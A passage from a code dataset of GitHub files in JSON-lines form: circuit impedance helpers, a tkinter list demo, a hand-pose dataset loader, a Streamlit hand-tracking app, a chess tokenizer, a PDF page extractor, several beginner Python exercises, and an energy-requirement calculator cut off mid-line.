inv_sum_inv(ls)\n if cs is not None: \n return sum(cs)\n return None\n\n\n@detect_verbose\ndef cseries(zs: list[tuple[float]]=None) -> tuple[float]:\n \"\"\"\n Compute the equivalent impedance in complex regtangular form of many impedances in series\n \"\"\"\n if zs is None or not len(zs):\n return (0, 0)\n z_sum: tuple[float] = zs[0]\n for z in zs[1:]:\n z_sum = complex_arithmetic(z_sum, \"+\", z)\n return z_sum\n\n\n@detect_verbose\ndef pseries(ps: list[tuple[float]]=None) -> tuple[float]:\n \"\"\"\n Compute the equivalent impedance in phasor form of many impedances in series \n \"\"\"\n if ps is None or not len(ps):\n return (0, 0)\n p_sum: tuple[float] = ps[0]\n for p in ps[1:]:\n p_sum = phasor_arithmetic(p_sum, \"+\", p)\n return p_sum\n\n\n@detect_verbose\ndef cparallel(zs: list[tuple[float]]=None) -> tuple[float]:\n \"\"\"\n Compute the equivalent impedance in complex rectangular form of many impedances in parallel \n \"\"\"\n if zs is None or not len(zs):\n return (0, 0)\n inv_sum: tuple[float] = complex_arithmetic((1, 0), \"/\", zs[0])\n for z in zs[1:]:\n inv_curr = complex_arithmetic((1, 0), \"/\", z)\n inv_sum = complex_arithmetic(inv_sum, \"+\", inv_curr)\n return complex_arithmetic((1, 0), \"/\", 
inv_sum)\n\n\n@detect_verbose\ndef pparallel(ps: list[tuple[float]]=None) -> tuple[float]:\n \"\"\"\n Compute the equivalent impedance in phasor form of many impedances in parallel\n \"\"\"\n if ps is None or not len(ps):\n return (0, 0)\n zs = list(map(phasor_to_rectangular, ps))\n return cparallel(zs)\n\n\n@detect_verbose\ndef Z(r: float=None, l: float=None, c: float=None, w: float=None) -> tuple[float]:\n \"\"\"\n Compute the impedance of a resistor, an inductor, or a capacitor in an AC circuit\n \"\"\"\n if r is not None:\n return (r, 0)\n if l is not None and w is not None:\n return (0, l * w)\n if c is not None and w is not None:\n return (0, - 1 / (c * w))\n return None\n\n\n","repo_name":"neil-zt/eecs-tools","sub_path":"Steady.py","file_name":"Steady.py","file_ext":"py","file_size_in_byte":5771,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"38585073616","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom tkinter.messagebox import showinfo\n\n\ndef main():\n window = tk.Tk()\n window.title('Course 10 Exe 2')\n\n # Window Size\n width = 600\n height = 200\n\n # Centering the Window\n left = int((window.winfo_screenwidth() - width) / 2)\n top = int((window.winfo_screenheight() - height) / 2)\n\n # Changing the attributes\n window.geometry(f'{width}x{height}+{left}+{top}')\n window.resizable(0, 0)\n window.attributes('-topmost', 1)\n\n header = ttk.Label(window, text='This is an List Example')\n header.pack(fill='x', padx=5, pady=5)\n\n columns = ('name', 'username', 'email')\n\n elements = [\n ('Elio', 'elio', 'elio@mail.com'),\n ('Day', 'day', 'day@mail.com'),\n ('Eli', 'eli', 'eli@mail.com')\n ]\n\n global elementList\n elementList = ttk.Treeview(\n window, columns=columns, show='headings', height=100, selectmode='browse')\n\n elementList.heading('name', text='Name')\n elementList.heading('username', text='Username')\n elementList.heading('email', text='Email')\n\n for element in elements:\n elementList.insert('', tk.END, values=element)\n\n elementList.bind('<>', showElement)\n\n elementList.pack(padx=5, pady=5)\n\n window.mainloop()\n\n\ndef showElement(event):\n showinfo(\n title='Element',\n message=elementList.item(elementList.selection())['values']\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"perezcasal91/open-bootcamp-course","sub_path":"basic-python/10/course10_2.py","file_name":"course10_2.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30191453233","text":"import cv2\nimport torch\nimport torch.utils.data\nimport torch.optim.lr_scheduler as lr_scheduler\nimport numpy as np\nimport scipy.io as scio\nimport os\nfrom PIL import Image\nfrom torch.autograd import Variable\nfrom tqdm import tqdm\nfrom src import random_erasing\nimport logging\nimport time\nimport datetime\nimport random\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\nu0 = 64\nv0 = 64\n\n# DataHyperParms\nTrainImgFrames = 3000\nTestImgFrames = 1000\nkeypointsNumber = 14\ncropWidth = 128 # 176\ncropHeight = 128 # 176\nbatch_size = 64\nlearning_rate = 0.00035\nWeight_Decay = 1e-4\nnepoch = 35\nRegLossFactor = 3\nspatialFactor = 0.5\nRandCropShift = 5\nRandshiftDepth = 1\nRandRotate = 180\nRandScale = (1.0, 0.5)\n# xy_thres = 110\n# depth_thres = 150\n\nrandomseed = 12345\nrandom.seed(randomseed)\nnp.random.seed(randomseed)\ntorch.manual_seed(randomseed)\n\nsave_dir = './result/NYU_batch_64_12345'\n\ntry:\n 
os.makedirs(save_dir)\nexcept OSError:\n pass\n\n\n\njoint_id_to_name = {\n 0: 'pinky tip',\n 1: 'pinky mid',\n 2: 'ring tip',\n 3: 'ring mid',\n 4: 'middle tip',\n 5: 'middle mid',\n 6: 'index tip',\n 7: 'index mid',\n 8: 'thumb tip',\n 9: 'thumb mid',\n 10: 'thumb root',\n 11: 'wrist back',\n 12: 'wrist',\n 13: 'palm',\n}\n\n\ndef transform(img, label, matrix):\n '''\n img: [H, W] label, [N,2]\n '''\n img_out = cv2.warpAffine(img ,matrix ,(cropWidth ,cropHeight))\n label_out = np.ones((keypointsNumber, 3))\n label_out[: ,:2] = label[: ,:2].copy()\n label_out = np.matmul(matrix, label_out.transpose())\n label_out = label_out.transpose()\n\n return img_out, label_out\n\n\ndef dataPreprocess(data, label, augment=True):\n\n # if augment:\n # imgResize, label_xy = transform(imgResize, label_xy, matrix) ## rotation, scale\n if random.random()<0.5:\n data = data[:, ::-1] # [H,W]\n label[1] = -label[1]\n\n return data, label\n\n\nclass my_dataloader(torch.utils.data.Dataset):\n\n def __init__(self, FileDir, mode=\"train\", augment=True):\n self.FileDir = FileDir\n self.depths = np.load(FileDir+\"/depth_{}.npy\".format(mode)) # [N,W,H]\n # self.depths = np.transpose(self.depths,(0,2,1)) # [N,H,W]\n self.labels = np.load(FileDir+\"/label_{}.npy\".format(mode))\n self.mode = mode\n self.augment = augment\n # self.randomErase = random_erasing.RandomErasing(probability=0.5, sl=0.02, sh=0.4, r1=0.3, mean=[0])\n\n def __getitem__(self, index):\n\n depth = self.depths[index, :, :] # [128,128]\n label = self.labels[index, :] # [42]\n label = label.reshape((14,3))\n # data, label = dataPreprocess(depth, label, self.augment)\n\n depth = depth[None] # [1,128,128]\n # if self.augment:\n # depth = self.randomErase(depth)\n return torch.Tensor(depth), torch.Tensor(label)\n\n def __len__(self):\n return self.depths.shape[0]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Zyyxsth/A2J","sub_path":"src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26597153246","text":"import cv2\nimport numpy as np\nimport mediapipe as mp\nimport streamlit as st\nfrom streamlit_webrtc import webrtc_streamer, WebRtcMode, RTCConfiguration\nimport time\nimport av\n\nmp_drawing = mp.solutions.drawing_utils\nmp_drawing_styles = mp.solutions.drawing_styles\nmp_hands = mp.solutions.hands\n\nhands = mp_hands.Hands(\n model_complexity=1,\n min_detection_confidence=0.5,\n min_tracking_confidence=0.5\n)\n\n\ndef process(image):\n image.flags.writeable = False\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n results = hands.process(image)\n\n image.flags.writeable = True\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n if results.multi_hand_landmarks:\n for hand_landmarks in results.multi_hand_landmarks:\n mp_drawing.draw_landmarks(\n image,\n hand_landmarks,\n mp_hands.HAND_CONNECTIONS,\n mp_drawing_styles.get_default_hand_landmarks_style(),\n mp_drawing_styles.get_default_hand_connections_style())\n return cv2.flip(image, 1)\n\nRTC_CONFIGURATION = RTCConfiguration(\n {\"iceServers\": [{\"urls\": [\"stun:stun.l.google.com:19302\"]}]}\n)\n\n\nclass VideoProcessor:\n\n\n x = [300, 245, 200, 170, 145, 130, 112, 103, 93, 87, 80, 75, 70, 67, 62, 59, 57]\n y = [20, 25, 30, 35, 40, 45, 50, 55, 60, 65, 70, 75, 80, 85, 90, 95, 100]\n coff = np.polyfit(x, y, 2) # y = Ax^2 + Bx + C\n pTime = 0\n cTime = 0\n\n def recv(self, frame):\n\n img = frame.to_ndarray(format=\"bgr24\")\n\n img = process(img)\n \n # 
FPS\n \n self.cTime = time.time()\n fps = 1 / (self.cTime - self.pTime)\n self.pTime = self.cTime\n cv2.putText(img, f'FPS: {int(fps)}', (40, 50), cv2.FONT_HERSHEY_COMPLEX,\n 1, (255, 0, 0), 3)\n\n\n return av.VideoFrame.from_ndarray(img, format=\"bgr24\")\n\ndef main():\n # Gesture Volume Control Application #\n st.title(\"Gesture Volume Control using Hand Detection\")\n activities = [\"Home\", \"Webcam Face Detection\"]\n choice = st.sidebar.selectbox(\"Select Activity\", activities)\n st.sidebar.markdown(\n \"\"\" Developed by \n\n Group Members:\n Saurabh_Keskar\n Sahil Bhawani\n Ajay Mahajan\n Sushant Gawade\n \"\"\")\n if choice == \"Home\":\n html_temp_home1 = \"\"\"
<div style=\"background-color:#6D7B8D;padding:10px\">\n <h4 style=\"color:white;text-align:center;\">\n The hand detected from video stream is used to control volume of device in real time using OpenCV, MediaPipe and PyCaw Libraries</h4>\n </div>\n </br>
\"\"\"\n st.markdown(html_temp_home1, unsafe_allow_html=True)\n st.write(\"\"\"\n The application has two functionalities.\n\n 1. Real time Hand Detection using web cam feed\n\n 2. Measure hand distance and control volume using nearest hand\n\n \"\"\")\n elif choice == \"Webcam Face Detection\":\n st.header(\"Webcam Live Feed\")\n st.write(\"Click on start to use webcam and detect your face emotion\")\n webrtc_streamer(\n key=\"WYH\",\n mode=WebRtcMode.SENDRECV,\n rtc_configuration=RTC_CONFIGURATION,\n media_stream_constraints={\"video\": True, \"audio\": False},\n video_processor_factory=VideoProcessor,\n async_processing=True,\n )\n\n else:\n pass\n\nif __name__ == \"__main__\":\n main()\n \n","repo_name":"skkeskar2000/cv_project","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73996724989","text":"from datasets import load_dataset\nfrom transformers import AutoTokenizer\n\n# Load data\nraw_dataset = load_dataset(\"royal42/lichess_elite_games\")\n\n# Load pretrained tokenizer\ntokenizer = AutoTokenizer.from_pretrained(\"royal42/chess_tokenizer\", use_fast=True) \n\n# Tokenize all of the data, this will take a bit unless its cached.\ncontext_length = 256\n\ndef tokenize(element):\n outputs = tokenizer(\n element[\"text\"],\n max_length=context_length,\n truncation=True\n )\n return outputs\n\n\ntokenized_datasets = raw_dataset.map(\n tokenize, batched=True, remove_columns=raw_dataset[\"train\"].column_names\n)\n\ntokenized_datasets.save_to_disk('./data/tokenized_files')","repo_name":"JayOrten/transformer_chess","sub_path":"main/scripts/tokenize_data.py","file_name":"tokenize_data.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"23849974605","text":"\"\"\" Viết chương trình Python kiểm tra số nguyên nhập vào là\n- số dương chẵn\n- số dương lẻ\n- số âm chẵn\n- số âm lẻ \"\"\"\n\n\nnum = int(input(\"Nhap vao so nguyen: \"))\n\nif num == 0:\n print(\"So khong\")\nelse:\n s = 'duong'\n\n if num < 0:\n s = 'am'\n\n s1 = 'chan'\n if num % 2 != 0:\n s1 = 'le'\n\n print(f\"So {s} {s1}\")\n\n\n\n","repo_name":"Sangoxyz/tnt","sub_path":"Exepy/exe10.py","file_name":"exe10.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"7191826855","text":"def hw1():\n for i in range(9, 0, -1):\n print(\"*\"*i)\n\n\ndef hw2():\n for i in range(10):\n print(\"2 x {} = {}\".format(i, 2*i))\n\n\ndef hw3():\n sum_i = 0\n i = 1\n while i <= 1000:\n if(i % 3):\n sum_i += i\n i += 1\n print(sum_i)\n\n\ndef hw4():\n mutsa_scores = [90, 77, 40, 55, 90, 100, 88]\n avg_mutsa = 0\n for i in mutsa_scores:\n avg_mutsa += i\n print(avg_mutsa/len(mutsa_scores))\n\n\ndef hw5():\n print(\"전화번호 받기 : \", end='')\n phone_number = ''.join(str(input()).replace(\" \", \"\").replace(\",\", \"\").replace(\".\", \"\").split(\"-\"))\n print(\"전화번호 출력 :\", phone_number)\n print(\"영어 이름 받기 : \", end='')\n first_name, last_name = map(str, input().split())\n print(f'first name : {first_name.title()}, last_name : {last_name.title()}')\n\n\nfor i in range(1, 10):\n for j in range(1, 10):\n print(\"{} x {} = {}\".format(i, j, 
i*j))\n","repo_name":"dooking/LikeLion","sub_path":"session4/hw.py","file_name":"hw.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"74766213628","text":"\"\"\"Return count number of prime numbers, starting at 2.\n\nFor example::\n\n >>> primes(0)\n []\n\n >>> primes(1)\n [2]\n\n >>> primes(5)\n [2, 3, 5, 7, 11]\n\n\"\"\"\n\n\ndef primes(num_primes):\n \"\"\"Return count number of prime numbers, starting at 2.\n Assume list of integers for potential prime numbers goes to 100.\"\"\"\n\n if num_primes == 0:\n return []\n\n list_of_primes = []\n \n for i in range(2,101):\n if is_prime(i):\n list_of_primes.append(i)\n\n if len(list_of_primes) == num_primes:\n return list_of_primes\n\n\ndef is_prime(num):\n \"\"\"Returns True if number is prime\"\"\"\n factors = []\n\n for i in range(1,num+1):\n if num % i == 0:\n factors.append(i)\n\n if len(factors) > 2:\n return False\n return True\n\n\n\nif __name__ == '__main__':\n import doctest\n if doctest.testmod().failed == 0:\n print(\"\\n*** ALL TESTS PASSED. GREAT WORK!\\n\")\n","repo_name":"ciestupinan/coding-challenges","sub_path":"primes/primes.py","file_name":"primes.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"17800845111","text":"from PyPDF2 import PdfFileReader, PdfFileWriter\r\n\r\n#파일명 받기\r\npath = str(input(\"What is the file name?-ex.test.pdf\\n\"))\r\n\r\npdfReader = PdfFileReader(path, \"rb\")\r\n\r\nnewpdfWriter = PdfFileWriter()\r\n\r\n#원하는 페이지 번호\r\nwhile True:\r\n pgnum = int(input(\"Which page do you want to extract?-if finished please type 0\\n\"))\r\n if pgnum==0:\r\n break\r\n newpdfWriter.addPage(pdfReader.getPage(pgnum))\r\n print(\"Added page number \"+str(pgnum)+\"\\n\")\r\n \r\n\r\n#저장 이름 설정\r\nnewfile = str(input(\"Please type the new file name - ex.test\\n\"))\r\n\r\nnewpdfWriter.write(open(\"./\"+newfile+\".pdf\", \"wb\"))\r\n\r\nprint(\"Saved successfully\")\r\n","repo_name":"hanbin07/PDF-extracter","sub_path":"PdfModify.py","file_name":"PdfModify.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"32161189644","text":"welcome = \"Hi! Let's put your trivia knowledge to the test. \" \\\r\n \"I bet you will ace it!\"\r\nsend_message(welcome)\r\ntrivia_quiz = [\r\n {\r\n\t\t\"question\": \"What is the name of Harry Potter's school?\",\r\n\t\t\"answer\": \"Hogwarts\"\r\n\t},\r\n\t{\r\n\t\t\"question\": \"Who was the first Disney Princess?\",\r\n\t\t\"answer\": \"Snow White\"\r\n\t},\r\n\t{\r\n\t \r\n\t # Add another \"question\" & \"answer\"\r\n\t \"question\": \"Who is Stefani Joanne Angelina Germanotta?\",\r\n\t \"answer\": \"Lady Gaga\"\r\n\t \r\n\t}\r\n]\r\n\r\n# Use a for to send all questions\r\nfor t in trivia_quiz:\r\n send_message(t[\"question\"])","repo_name":"crue-ton-school/code-monkey-chat-bot","sub_path":"12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"40085114457","text":"\"\"\"\nList Exercise 3\n\nImplementieren Sie die Funktion except_for(), welche eine Kopie von 'my_list' zurückgibt, ohne dass die ausgeschlossenen\nElemente 'excluded' darin enthalten sind. 
Benutzen Sie die nachfolgenden Tests zur Kontrolle.\n\"\"\"\n\n\ndef except_for(my_list, excluded):\n result = []\n for element in my_list:\n if element not in excluded:\n result.append(element)\n return result\n\n\n# Tests\nprint(except_for([1, 2, 3, 4], [1, 2])) # -> [3, 4]\nprint(except_for([1, 2, 3, 2], [0, 2])) # -> [1, 3]\n","repo_name":"AndrasTarlos/s4f","sub_path":"py-basics/src/lectures/lists/exercise3.py","file_name":"exercise3.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"37745602633","text":"import functools\nimport operator\nfrom typing import (\n Callable, Tuple, Union, Optional, Callable,\n Type, TypeVar, Generic, Any, ClassVar\n)\nfrom abc import ABCMeta, abstractmethod, abstractproperty\n\nfrom .base import UnitMeta\n\n\n# Domain & Codomain: typecheckable Type objects.\n# For all actual concrete instances in the domain and codomain:\n# assert(isintance(domain_element, Domain) == True)\n# assert(isinstance(codomain_element), Codomain) == True)\n# Note - this is simplest & easiest when Domain and Codomain are\n# concrete classes (such as Scalar) - but they can be abstract types,\n# unions, or interfaces as well (such as numbers.Number).\nDomain = TypeVar('Domain')\nCodomain = TypeVar('Codomain')\nEitherDomain = Union[Domain, Codomain]\n# These two function signatures should be variant on number of arguments. IE\n# DomainFunction = Callable[Tuple[Domain, ...], Domain]\n# But Python 3.5 cannot handle this\n# So we do the best we can, which is:\nDomainFunction = Callable[[Domain], Domain]\nCodomainFunction = Callable[[Codomain], Codomain]\n\n\nclass Functor(Generic[Domain, Codomain], metaclass=ABCMeta):\n \"\"\"\n Takes two objects in the domain, and a function on those, and applies it.\n\n Note - this is *not* a monad - because it is not a container.\n It is intended for Scalar and other UnitsLeaf objects - which cannot\n contain other Scalar or UnitsLeaf objects.\n\n Note - technically this is an Invariant Functor - since it has the\n ability to construct and destruct.\n\n Abstracts:\n construct\n map\n \"\"\"\n Domain: ClassVar[Type[Domain]]\n Codomain: ClassVar[Type[Codomain]]\n\n def __init__(self, domain: Type[Domain], codomain: Type[Domain]):\n self.Domain = domain\n self.Codomain = codomain\n\n @abstractmethod\n def construct(self, domain: Domain) -> Codomain:\n return NotImplemented\n\n @abstractmethod\n def map(self, func: DomainFunction,\n *codomains: Tuple[Codomain, ...]) -> Codomain:\n return NotImplemented\n\n def lift(self, func: DomainFunction) -> CodomainFunction:\n @functools.wraps(func)\n def wrapper(*scalars: Tuple[Scalar, ...]) -> Scalar:\n return self.map(func, *scalars)\n return wrapper\n\n\nclass InvariantFunctor(Functor, Generic[Domain, Codomain], metaclass=ABCMeta):\n \"\"\"\n An InvariantFunctor is a Functor which can map in both directions,\n forward (Domain --> Codomain) and reverse (Codomain --> Domain).\n\n This allows us to implement map in terms of self.destruct.\n Note - this doesn't work in general - but it *does* work for our\n use-case (Scalar wrapping Number).\n\n This Functor presumes that it's Domain and Codomain are non-overlapping.\n If not, the 'apply' function may have incorrect behavior.\n\n Abstracts:\n destruct\n construct\n \"\"\"\n @abstractmethod\n def destruct(self, codomain: Codomain) -> Domain:\n \"\"\"Inverse of 'construct'. 
Translates codomain elements into domain.\"\"\"\n return NotImplemented\n\n def delift(self, func: CodomainFunction) -> DomainFunction:\n @functools.wraps(func)\n def wrapper(*domains: Tuple[Domain, ...]) -> Domain:\n return func(\n *tuple(self.destruct(elm) for elm in domains)\n )\n return wrapper\n\n def map(self, func: DomainFunction,\n *codomains: Tuple[Codomain, ...]) -> Codomain:\n return self.construct(\n func(\n *tuple(self.destruct(arg) for arg in codomains)\n )\n )\n\n def demap(self, func: CodomainFunction,\n *domains: Tuple[Domain, ...]) -> Domain:\n return self.destruct(\n func(\n *tuple(self.construct(arg) for arg in domains)\n )\n )\n\n def bind(self, func: DomainFunction,\n *values: Tuple[EitherDomain, ...]) -> Codomain:\n \"\"\"\n The .map function, but dispatches on category, so elements of codomain are\n destructed into the domain before mapping.\n\n Warning - this implementation of 'bind' depends on the\n Domain and Codomain to be non-overlapping.\n\n Allows functions to take either domain or codomain elements.\n Thus, statements like this can work:\n Unit(5) + 4\n Unit(5) + Unit(4)\n\n\n I *just* realized that this is just another way to implement 'bind'...\n ... renaming it now\n \"\"\"\n _domains = tuple(\n value if isinstance(value, self.Domain)\n else self.destruct(value)\n for value in values\n )\n # _values = tuple(value if not isinstance(value, self.Codomain)\n # else self.destruct(value)\n # for value in values)\n return self.construct(func(*_domains))\n","repo_name":"OaklandPeters/py-arithmetic-units","sub_path":"py_units/functor.py","file_name":"functor.py","file_ext":"py","file_size_in_byte":4826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"44680452284","text":"import time\n\nexecute = True\nclear_screen = '\\n'*50\nsep = '-='*15\ntable = '-'*10\nidade = 0\nidades = ['anos', 'meses']\naltura = 0\npeso = 0\nage_type = None\nsexo = None\ncond = None\neer = 0\n\nwhile execute:\n print(clear_screen, sep)\n print(f'\\n\\tValores:\\n\\n\\t{table}\\n\\tPeso: {peso} kg\\n\\t{table}\\n\\tAltura: {altura} cm\\n\\t{table}\\n\\tIdade: {idade} {age_type}\\n\\t{table}\\n\\tSexo: {sexo}\\n\\t{table}\\n\\tCondição: {cond}\\n\\t{table}')\n print('\\n\\n\\tEscolha uma opção')\n print('\\n\\t[0] Alterar valores\\n\\t[1] Calcular EER\\n\\n\\t[ENTER] Sair\\n\\n')\n print(sep)\n opt = input('\\n...')\n if opt == '':\n print(clear_screen)\n execute = False\n elif opt == '0':\n selection = True\n while selection:\n print(clear_screen, sep)\n print(f'\\n\\tValores:\\n\\n\\t{table}\\n\\tPeso: {peso} kg\\n\\t{table}\\n\\tAltura: {altura} cm\\n\\t{table}\\n\\tIdade: {idade} {age_type}\\n\\t{table}\\n\\tSexo: {sexo}\\n\\t{table}\\n\\tCondição: {cond}\\n\\t{table}')\n print('\\n\\tEscolha alguma opção para alterar:\\n\\n\\t[0] Peso\\n\\t[1] Altura\\n\\t[2] Idade\\n\\t[3] Tipo de idade\\n\\t[4] Sexo\\n\\t[5] Condição\\n\\n\\t[ENTER] Sair\\n\\n')\n print(sep)\n choosen = input('...')\n if choosen == '':\n if age_type not in idades:\n age_type = None\n print(clear_screen, sep)\n print('\\nINSIRA UMA OPÇÃO VÁLIDA DE IDADE\\n')\n print(sep)\n time.sleep(2)\n else:\n selection = False\n elif choosen == '0':\n print(clear_screen, sep)\n peso = input(f'\\tPeso: {peso}\\n\\n\\tInsira um novo peso:\\n{sep}\\n...')\n elif choosen == '1':\n print(clear_screen, sep)\n altura = input(f'\\tAltura: {altura}\\n\\n\\tInsira uma nova altura:\\n{sep}\\n...')\n elif choosen == '2':\n print(clear_screen, sep)\n idade = input(f'\\tIdade: 
{idade}\\n\\n\\tInsira uma nova idade:\\n{sep}\\n...')\n elif choosen == '3':\n print(clear_screen, sep)\n age_type = input(f'\\tTipo de idade: {age_type}\\n\\n\\tInsira um novo tipo de idade (meses ou anos):\\n{sep}\\n...')\n elif choosen == '4':\n print(clear_screen, sep)\n sexo = input(f'\\tSexo: {sexo}\\n\\n\\tInsert a new sex (M or F):\\n{sep}\\n...')\n elif choosen == '5':\n print(clear_screen, sep)\n cond = input(f'\\tCondição: {cond}\\n\\n\\tInsira uma nova condição (s: sedentario, p: pouco ativo, a: ativo, m: muito ativo):\\n{sep}\\n...')\n elif opt == '1':\n if age_type == 'meses':\n if float(idade) < 2.99:\n if sexo == \"M\":\n eer = -716.45-(1.00 * float(idade)) + (17.82 * float(altura)) + (15.06 * float(peso)) + 200\n elif sexo == 'F':\n eer = -69.15-(80.00 * float(idade)) + (2.65 * float(altura)) + (56.15 * float(peso)) + 180\n elif float(idade) < 6:\n if sexo == \"M\":\n eer = -716.45-(1.00 * float(idade)) + (17.82 * float(altura)) + (15.06 * float(peso)) + 50\n elif sexo == 'F':\n eer = -69.15-(80.00 * float(idade)) + (2.65 * float(altura)) + (54.15 * float(peso)) + 60\n elif float(idade) > 36:\n if sexo == \"M\":\n eer = -716.45-(1.00 * float(idade)) + (17.82 * float(altura)) + (15.06 * float(peso)) + 20\n elif sexo == 'F':\n if float(idade) < 12:\n eer = -69.15-(80.00 * float(idade)) + (2.65 * float(altura)) + (54.15 * float(peso)) + 20\n if float(idade) >= 12:\n eer = -69.15-(80.00 * float(idade)) + (2.65 * float(altura)) + (54.15 * float(peso)) + 15\n elif age_type == 'anos':\n if float(idade) < 19:\n if sexo == 'M':\n if float(idade) > 3:\n if cond == 's':\n eer = -447.51 + (3.68 * float(idade)) + (13.01 * float(altura)) + (13.15 * float(peso)) + 20\n elif cond == 'p':\n eer = 19.12 + (3.68 * float(idade)) + (8.62 * float(altura)) + (20.28 * float(peso)) + 20\n elif cond == 'a':\n eer = -388.19 + (3.68 * float(idade)) + (12.66 * float(altura)) + (20.46 * float(peso)) + 20\n elif cond == 'm':\n eer = -671.75 + (3.68 * float(idade)) + (15.38 * float(altura)) + (23.25 * float(peso)) + 20\n if float(idade) > 8:\n if cond == 's':\n eer = -447.51 + (3.68 * float(idade)) + (13.01 * float(altura)) + (13.15 * float(peso)) + 15\n elif cond == 'p':\n eer = 19.12 + (3.68 * float(idade)) + (8.62 * float(altura)) + (20.28 * float(peso)) + 15\n elif cond == 'a':\n eer = -388.19 + (3.68 * float(idade)) + (12.66 * float(altura)) + (20.46 * float(peso)) + 15\n elif cond == 'm':\n eer = -671.75 + (3.68 * float(idade)) + (15.38 * float(altura)) + (23.25 * float(peso)) + 15\n if float(idade) > 13:\n if cond == 's':\n eer = -447.51 + (3.68 * float(idade)) + (13.01 * float(altura)) + (13.15 * float(peso)) + 25\n elif cond == 'p':\n eer = 19.12 + (3.68 * float(idade)) + (8.62 * float(altura)) + (20.28 * float(peso)) + 25\n elif cond == 'a':\n eer = -388.19 + (3.68 * float(idade)) + (12.66 * float(altura)) + (20.46 * float(peso)) + 25\n elif cond == 'm':\n eer = -671.75 + (3.68 * float(idade)) + (15.38 * float(altura)) + (23.25 * float(peso)) + 25\n else:\n if cond == 's':\n eer = -447.51 + (3.68 * float(idade)) + (13.01 * float(altura)) + (13.15 * float(peso)) + 20\n elif cond == 'p':\n eer = 19.12 + (3.68 * float(idade)) + (8.62 * float(altura)) + (20.28 * float(peso)) + 20\n elif cond == 'a':\n eer = -388.19 + (3.68 * float(idade)) + (12.66 * float(altura)) + (20.46 * float(peso)) + 20\n elif cond == 'm':\n eer = -671.75 + (3.68 * float(idade)) + (15.38 * float(altura)) + (23.25 * float(peso)) + 20\n elif sexo == \"F\":\n if float(idade) > 8:\n if cond == 's':\n eer = 55.59 - (22.25 * 
float(idade)) + (8.43 * float(altura)) + (17.07 * float(peso)) + 15\n elif cond == 'p':\n eer = -297.54 - (22.25 * float(idade)) + (12.77 * float(altura)) + (14.73 * float(peso)) + 15\n elif cond == 'a':\n eer = -189.55 - (22.25 * float(idade)) + (11.74 * float(altura)) + (18.34 * float(peso)) + 15\n elif cond == 'm':\n eer = -709.59 - (22.25 * float(idade)) + (18.22 * float(altura)) + (14.25 * float(peso)) + 15\n elif float(idade) > 13:\n if cond == 's':\n eer = 55.59 - (22.25 * float(idade)) + (8.43 * float(altura)) + (17.07 * float(peso)) + 30\n elif cond == 'p':\n eer = -297.54 - (22.25 * float(idade)) + (12.77 * float(altura)) + (14.73 * float(peso)) + 30\n elif cond == 'a':\n eer = -189.55 - (22.25 * float(idade)) + (11.74 * float(altura)) + (18.34 * float(peso)) + 30\n elif cond == 'm':\n eer = -709.59 - (22.25 * float(idade)) + (18.22 * float(altura)) + (14.25 * float(peso)) + 30\n else:\n if cond == 's':\n eer = 55.59 - (22.25 * float(idade)) + (8.43 * float(altura)) + (17.07 * float(peso)) + 20\n elif cond == 'p':\n eer = -297.54 - (22.25 * float(idade)) + (12.77 * float(altura)) + (14.73 * float(peso)) + 20\n elif cond == 'a':\n eer = -189.55 - (22.25 * float(idade)) + (11.74 * float(altura)) + (18.34 * float(peso)) + 20\n elif cond == 'm':\n eer = -709.59 - (22.25 * float(idade)) + (18.22 * float(altura)) + (14.25 * float(peso)) + 20\n elif float(idade) >= 19:\n if sexo == 'M':\n if cond == 's':\n eer = 753.07 - (10.83 * float(idade)) + (6.50 * float(altura)) + (14.10 * float(peso))\n elif cond == 'p':\n eer = 581.47 - (10.83 * float(idade)) + (8.30 * float(altura)) + (14.94 * float(peso))\n elif cond == 'a':\n eer = 1004.82 - (10.83 * float(idade)) + (6.52 * float(altura)) + (15.91 * float(peso))\n elif cond == 'm':\n eer = -517.88 - (10.83 * float(idade)) + (15.61 * float(altura)) + (19.11 * float(peso))\n elif sexo == \"F\":\n if cond == 's':\n eer = 584.90 - (7.01 * float(idade)) + (5.72 * float(altura)) + (11.71 * float(peso))\n elif cond == 'p':\n eer = 575.77 - (7.01 * float(idade)) + (6.60 * float(altura)) + (12.14 * float(peso))\n elif cond == 'a':\n eer = 710.25 - (7.01 * float(idade)) + (6.54 * float(altura)) + (12.34 * float(peso))\n elif cond == 'm':\n eer = 511.83 - (7.01 * float(idade)) + (9.07 * float(altura)) + (12.56 * float(peso))\n\n print(clear_screen, sep)\n print(f'\\n\\tSeu 